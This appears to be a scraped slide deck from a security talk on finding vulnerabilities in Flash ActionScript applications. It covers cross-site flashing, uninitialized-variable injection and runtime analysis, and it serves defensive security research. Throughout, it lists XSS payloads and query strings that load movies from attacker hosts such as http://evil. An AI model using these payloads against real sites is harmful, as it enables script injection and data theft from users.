360 likes | 520 Views
Finding Vulnerabilities in Flash Applications. Stefano Di Paola CTO MindedSecurity stefano.dipaola@mindedsecurity.com +393209495590. Stefano Di Paola: CTO & Co-Founder Minded Security Security Engineer & Researcher Web App Pen Tester Code Review and Forensic
E N D
Finding Vulnerabilities in Flash Applications Stefano Di Paola CTO MindedSecurity stefano.dipaola@mindedsecurity.com +393209495590
Stefano Di Paola: CTO & Co-Founder Minded Security Security Engineer & Researcher Web App Pen Tester Code Review and Forensic Vulnerabilities (PDF UXSS & Others) OWASP Italy R&D Director $ Whoami^J 2
Agenda • Introduction • SWF Client Side Attacks • Finding Injection Entry Points • Potentially Dangerous Native Functions and Objects • Runtime Analysis 3
Agenda • Introduction • SWF Client Side Attacks • Finding Injection Entry Points • Potentially Dangerous Native Functions and Objects • Runtime Analysis 4
Objectives • Focus on Flash ActionScript 2 Applications Security • Understand the attack flow • Dead Code Analysis Methodology • Runtime Analysis Methodology 5
Flash Apps - Security Concerns • Can execute JavaScript when embedded in a HTML page and viewed from inside a Browser. • Can forge binary requests and HTTP Requests. • Can execute external Flash Movies. • Can play Audio/Video files natively. • Can display minimal HTML code inside a TextField.
Agenda • Introduction • SWF Client Side Attacks • Finding Injection Entry Points • Potentially Dangerous Native Functions and Objects • Runtime Analysis 7
SWF Client Side Attacks • This new attack vector was presented @ OWASP 2007 Appsec Conference in Milan, Italy • Relies on flawed SWF files and not on SWF parser • A flawed SWF is a SWF which could allow • classical XSS • Cross Site Flashing (the dark side of cross movie scripting) 8
Cross Site Flashing (XSF) XSF occurs when from different domains: One Movie loads another Movie with loadMovie* functions or other hacks and has access to the same sandbox or part of it XSF could also occurs when an HTML page uses *Script to script a Macromedia Flash movie, for example, by calling: GetVariable: access to flash public and static object from javascript as a string. SetVariable: set a static or public flash object to a new string value from javascript. Unexpected Browser to SWF communication could result in stealing data from SWF application 9
Accomplishing an Attack using flawed SWF • When a link to a flawed SWF is directly pasted to the location bar every browser automatically generates some HTML with Object and/or Embed tags: <html><body marginwidth="0" marginheight="0"><embed width="100%" height="100%" name="plugin" src="http://Url/To/Swf" type="application/x-shockwave-flash"/></body></html>
Attack Example to a Flawed SWF • A flawed SWF was uploaded to vi.ct.im Host. • Contains the following code • Let's see what an attacker could do with a browser (Video) v1.loadv = function () { this.varTarget = new MovieClip(); _root.createEmptyMovieClip('varTarget', 10); var v2 = new XML(); v2.load(_root.test); };
Accomplish an attack • So clicking and redirecting to a SWF will let the browser execute it on the main window. • Works with every browser. • IE7 needs: • Iframe 'src' could be used too. • Tested on Firefox • SWF/Browser interaction doesn't work in IE7 using javascript:. • We'll see when it works even with IE7 try{code}catch(e){location.reload()}
The Attack Flow We will see the dangerous mechanisms that could lead to Client Side Attacks • URL QueryString • Global Uninitialized Variables • flashVars • External Movies • Remote XML files • MP3 and Flv Movies • Embedded HTML
Agenda • Introduction • SWF Client Side Attacks • Finding Injection Entry Points • Potentially Dangerous Native Functions and Objects • Runtime Analysis
Register Globals in ActionScript • Similar to PHP Register Globals • Every uninitialized variable with global scope is a potential threat: • _root.* • _global.* • _level0.* • .* • It is easy to add it as a parameter in the query string: http://URL?language=http://evil if (_root.language != undefined) { Locale.DEFAULT_LANG = _root.language; } v5.load(Locale.DEFAULT_LANG + '/player_' + Locale.DEFAULT_LANG + '.xml');
Register Globals in Included Files 1/2 Assumptions made for _leveln movies are wrong when a movie supposed to be at level1 is loaded as _level0 _level(n-1).* /* Level0 Movie */ _level0.DEMO_PATH = getHost(this._url); loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'upperlev.swf', (_level0.demo_level + 1)); .... /* Level1 Movie 'upperlev.swf' */ .... loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ......
Register Globals in Included Files 2/2 Then let's load upperlev.swf and then use query string to initialize DEMO_PATH: http://host/upperlev.swf?DEMO_PATH=http://evil /* Level1 Movie 'upperlev.swf' */ .... loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ......
Agenda Introduction SWF Client Side Attacks Finding Injection Entry Points Potentially Dangerous Native Functions and Objects Runtime Analysis Static Analysis
Attack Patterns – Quick Reference • Some Attack patterns were already described in: • Testing Flash Applications • http://www.wisec.it/docs.php?id=5 • A quick reference of attack patterns which trigger XSS in SWF: • asfunction:getURL,javascript:alert('XSS') • javascript:alert('XSS') • <img src='javascript:alert(“XSS”)//.jpg'> • http://evil.ltd/evilversion7.swf
Attack Patterns – Quick Reference A quick reference of PDNF and Objects where attack pattern could be injected: getURL load*(URL,..) Functions loadVariables(url, level ) LoadMovie ( url, target ) LoadMovieNum( url, level ) XML.load ( url ) LoadVars.load ( url ) Sound.loadSound( url , isStreaming ); NetStream.play( url ); TextField.htmlText
Attack Patterns – GetURL New Issue • The GET issue^N^N^N^N^Nfeature: From Adobe: “..The GET method appends the variables to the end of the URL, and is used for small numbers of variables..” if a SWF contains the above, a request like becomes: Credits go to SirDarckCat and Kuza55 who found it getURL('javascript:SomeFunc(“someValue”)','','GET') http://victim/noundef.swf?a=0:0;alert('XSS') javascript:SomeFunc(“someValue”)?a=0:0;alert(123)
Attack Patterns – ExternalInterface New Issue • flash.external.ExternalInterface.call syntax Actually, methodName could be any Javascript code. In fact, when call('method123') is executed, a javascript function is called (www.develotec.com/flash8api.txt): public static call(methodName:String, [parameter1:Object]) try { __flash__toXML(method123()) ; } catch (e) { "<undefined/>"; }
External Interface Attack • What happens if a SWF contains: http://host/swf?callback=(new Function(“alert(‘Xss’)”)) • Works with Iframe and IE7 too flash.external.ExternalInterface.call(_root.callback) __flash__toXML((new Function(“alert(‘Xss’)”))())
Attack Patterns – Font New Issue • Some code like • Rewrites ‘something’ to <p font=“TIMES”>something</p> • That could be exploited by injecting: • fontFamily = '”><img src=”http://evil/evil.swf”><”' createTextField("txt", 999, 10, 10, 320, 240); txt.html=true; var _tf:TextFormat = new TextFormat(); _tf.font = _root.fontFamily; txt.setTextFormat( _tf ); txt.htmlText='something';
Modify the Data Flow 1/4 • Multiple classes and packages are often used to separate functionality. • In Flash, every class/package like • is compiled in the following way: class simpleClass{} push 'simpleClass' getVariable not not branchIfTrue label1 ... label1 end
Modify the Data Flow 2/4 • Decompiled by flare, results in: • So simpleClass is a _global attribute. • This means that it's initially undefined. • So it can be instantiated with a string value from the query string if (!simpleClass) { _global.simpleClass = function () {}; ... }
Modify the Data Flow 3/4 Suppose there is a class like: class simpleUtils { static public function testForSomething(){ if(ok) return true; else return false; } ... class simpleClass { static function main(){ if(!simpleUtils.testForSomething()) getURL('javascript:alert("Sorry!")'); else getURL('javascript:alert("ok!")'); } ...
Modify the Data Flow 4/4 • Sending the request: http://host/swf.swf?simpleUtils=blah • sets the object simpleUtils to an instantiated string, so: simpleUtils.testForSomething() becomes undefined and the flow is modified. if(!simpleUtils.testForSomething()) getURL('javascript:alert("Sorry!")'); else getURL('javascript:alert("ok!")');
Agenda • Introduction • SWF Client Side Attacks • Finding Injection Entry Points • Potentially Dangerous Native Functions and Objects • Runtime Analysis 29
Recipe for Runtime Analysis A method to find uninitialized variables A SWF Container which loads the external one One array of attack patterns A framework to mix our ingredients
Find Undefined Vars @ Runtime • Definition of __resolve: • from Adobe: “a reference to a user-defined function that is invoked if ActionScript code refers to an undefined property or method. If ActionScript code refers to an undefined property or method of an object, Flash Player determines whether the object's __resolve property is defined.” • As we need to find _root.* or _global.* undefined variables: _root.__resolve = function (name){ // name is undefined }
Attack Patterns Array From our knowledge base, an attack Array will contain the following elements: Direct load asfunction: getURL,javascript:gotRoot("")///d.jpg Controlled Evil Page/Host: http://at.tack.er/evil.swf Flash Html Injection: “'><img src='asfunction:getURL,javascript:gotRoot(“”)//.jpg' > Dom Injection: (gotRoot('')) Js/Flash Error: “'|!$%&/)=
A SWF Container The SWF to be analyzed is closed, so we need a wrapper which shares _root and _global variables The wrapper will contain __resolve methods for _root and _globals. var image_mcl = new MovieClipLoader(); image_mcl.addListener(mclListener); _root._lockroot=true image_mcl.loadClip( _root.swfurl+"?"+ _root.varToSend, _root.varTarget);
Conclusions • A free version of the SWF Runtime Analyser will be released by Minded Security. • Awareness about ActionScript security is growing but is still a drop in the ocean. • There is still a lot of research to do about Actionscript security.
Thank you :) Questions? Web: http://www.mindedsecurity.com Weblog: http://www.wisec.it Email: stefano.dipaola_at_mindedsecurity.com